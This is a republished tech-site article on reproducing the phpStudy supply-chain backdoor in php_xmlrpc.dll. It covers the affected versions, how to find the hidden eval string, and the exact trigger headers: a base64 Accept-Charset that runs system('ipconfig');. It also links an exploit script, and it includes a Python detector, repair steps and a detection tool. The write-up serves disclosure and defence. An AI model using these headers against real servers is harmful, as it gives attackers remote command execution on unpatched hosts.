2025-01-30 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/02 Report--
How do you reproduce the phpStudy backdoor in the integrated environment? This article gives a detailed analysis and solution for this problem, hoping to help readers who want to solve it find a simpler and more practical method.
0x00 Introduction
phpStudy is a program integration package for a PHP debugging environment. It bundles the latest Apache + PHP + MySQL + phpMyAdmin + ZendOptimizer, installs in one step and can be used without any configuration, which makes it a very convenient PHP debugging environment.
0x01 Vulnerability overview
phpStudy, a widely used PHP environment integration package, was announced to be the suspected target of a supply chain attack: the php_xmlrpc.dll module bundled with its PHP hides a backdoor (reported by Raytheon testing).
0x02 Affected versions
phpStudy20161103 version: php5.4.45 and php5.2.17
phpStudy20180211 version: php5.4.45 and php5.2.17
0x03 Environment setup
Reply "phpstudy environment" to the official account to get the package; after decompression it installs with no further thought or configuration.
0x04 Vulnerability exploitation
First, check whether the backdoor exists and where it is located:
\phpstudy\PHPTutorial\php\php-5.2.17\ext\
\phpstudy\PHPTutorial\php\php-5.4.45\ext\
Find the php_xmlrpc.dll file in that directory, open it with a text editor, and search for the keyword eval:
As shown in the figure, the presence of that string shows that the backdoor exists.
Then start the service with the vulnerable PHP version; I used 5.4.45. The location of the version switch is shown in the figure.
Then request any php file, intercept the packet, and add the following request header fields:
Accept-Encoding:gzip,deflate
Accept-Charset:c3lzdGVtKCdpcGNvbmZpZycpOw==
The space after the comma in Accept-Encoding must be removed. The Accept-Charset value is the base64 encoding of system('ipconfig');.
Replay the packet in Repeater and the backdoor is triggered successfully:
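Because the trigger has a fixed shape (an Accept-Encoding of exactly gzip,deflate with no space, plus a base64 Accept-Charset that decodes to PHP code), it can be flagged in raw HTTP requests. The detector below is an added example written for this article, not code from phpStudy or from the exploit script linked later; the sample requests, the header parsing and the list of PHP function names it looks for are assumptions of the example.

```python
import base64
import binascii
import re

# Constructed sample requests (not real traffic). The first carries the trigger
# headers described in the article; the second is an ordinary browser request.
SUSPECT_REQUEST = (
    "GET /index.php HTTP/1.1\r\n"
    "Host: 192.0.2.10\r\n"
    "Accept-Encoding:gzip,deflate\r\n"
    "Accept-Charset:c3lzdGVtKCdpcGNvbmZpZycpOw==\r\n"
    "\r\n"
)
BENIGN_REQUEST = (
    "GET /index.php HTTP/1.1\r\n"
    "Host: 192.0.2.10\r\n"
    "Accept-Encoding: gzip, deflate, br\r\n"
    "Accept-Charset: utf-8, iso-8859-1;q=0.5\r\n"
    "\r\n"
)

# A decoded Accept-Charset that is really PHP code, like the article's
# system('ipconfig');, contains a call to one of these functions (assumed list).
PHP_CODE_HINT = re.compile(rb"\b(system|eval|exec|shell_exec|passthru|assert)\s*\(", re.I)

def parse_headers(raw):
    """Return the request headers as a dict keyed by lower-cased header name."""
    headers = {}
    for line in raw.split("\r\n")[1:]:
        if not line:          # blank line ends the header block
            break
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers

def decode_charset_payload(value):
    """Base64-decode an Accept-Charset value; None if it is not valid base64."""
    try:
        return base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None

def is_backdoor_trigger(raw):
    """True when the request has the trigger shape: Accept-Encoding exactly
    'gzip,deflate' (no space) and an Accept-Charset that decodes to PHP code."""
    h = parse_headers(raw)
    if h.get("accept-encoding") != "gzip,deflate":
        return False
    payload = decode_charset_payload(h.get("accept-charset", ""))
    return payload is not None and PHP_CODE_HINT.search(payload) is not None
```

Running the same check over stored access logs that record request headers shows whether the backdoor was ever triggered on a host, not just whether the DLL is present.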
0x05 Repair method
Download the original php-5.4.45 or php-5.2.17 release from the official PHP website and replace php_xmlrpc.dll with the copy from it. Download addresses:
https://windows.php.net/downloads/releases/archives/php-5.2.17-Win32-VC6-x86.zip
https://windows.php.net/downloads/releases/archives/php-5.4.45-Win32-VC9-x86.zip
Detection tool:
https://www.xp.cn/zijian/
Backdoor exploitation script:
https://github.com/NS-Sp4ce/PHPStudy_BackDoor_Exp
This is the answer to the question of how to reproduce the phpStudy backdoor in the integrated environment. I hope the above content is of some help to you. If you still have many doubts, you can follow the industry information channel to learn more.